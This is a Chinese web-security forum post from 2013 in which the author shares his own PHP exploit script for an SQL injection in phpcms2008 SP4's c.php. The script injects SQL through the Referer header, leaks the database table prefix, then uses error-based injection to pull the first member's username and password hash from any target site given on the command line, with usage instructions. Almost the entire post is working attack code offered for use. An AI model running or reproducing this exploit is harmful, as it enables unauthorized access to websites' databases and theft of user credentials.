phpcms2008 sp4 注入Exp (保号 我也发个exp)

2013-05-01 22:51:59 58 5057
保号 我也发个exp
前段时间 情深哥哥 和西毒二货 都发过了
抱着学习的太多 自已也写了一个。。。
<?php



print_r ( "

+---------------------------------------+

title:phpcms2008 sp4 c.php exploit

mail:[email protected]

blog:[url]www.moonhack.org[/url]

bbs:[url]www.xinyues.org[/url]

data:2013.3.28        

+---------------------------------------+\n

" );

if ($argc < 2) {

print_r ( "

+---------------------------------------+

target:

php $argv[0] [url]www.target.com[/url] 

php $argv[0] [url]www.target.com[/url] /phpcms2008/

+---------------------------------------+\n

" );

exit ();

}

error_reporting ( E_ALL );

ini_set ( 'max_execution_time', '0' );

function send_http($host, $prot, $referer) {

        $data = "";

        $fp = @fsockopen ( $host, $prot, $errno, $errstr, 30 );

        if (! $fp) {

                exit ( "$host Connection failed" );

        } else {

                

                fwrite ( $fp, $referer );

                while ( ! feof ( $fp ) ) {

                        $data .= fgets ( $fp, 128 );

                }

                fclose ( $fp );

                return $data;

        }



}

$host = $argv [1];

$prot = "80";

$patch = isset ( $argv [2] ) ? $argv [2] : "";

$sql = "fuck'";



$prefix = http ( $host, $prot, $sql, $patch );

function http($host, $prot, $sql, $patch) {

        $preg = '/INSERT INTO `(.*)ads_/';

        $prefix = '';

        $referer = "GET /$patch" . "c.php?id=1 HTTP/1.1\r\n";

        $referer .= "Host: $host\r\n";

        $referer .= "REFERER: $sql\r\n";

        $referer .= "Connection: Close\r\n\r\n";

        $data = send_http ( $host, $prot, $referer );

        $data ;

        preg_match ( $preg, $data, $prefix );

        if (! $prefix) {

        exit ( "fail\r\n" );

        }

        print ("prefix:$prefix[1]") ;

        return $prefix [1];

}



$exp = http2 ( $host, $prot, $patch, $prefix );

function http2($host, $prot, $patch, $prefix) {

        $preg = '/\'~\'(.*):(.*)\'~1\'/';

        $sql2 = $sqlstring = "fuck'),('a','123','123','123',(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from " . $prefix . "member limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a))#";

        $referer = "GET /$patch" . "c.php?id=1 HTTP/1.1\r\n";

        $referer .= "Host: $host\r\n";

        $referer .= "REFERER: $sql2\r\n";

        $referer .= "Connection: Close\r\n\r\n";

        $data = send_http ( $host, $prot, $referer );

        preg_match ( $preg, $data, $exp );

        if (! $exp) {

                exit ( "fail\r\n" );

        }

        return $exp;

}

print_r ( "

success:$host

username:$exp[1]

password:$exp[2]

" );

?>
类别 Web安全

关于作者

darkmoon23篇文章760篇回复

darkmoon
58

评论58次

要评论?请先  登录  或  注册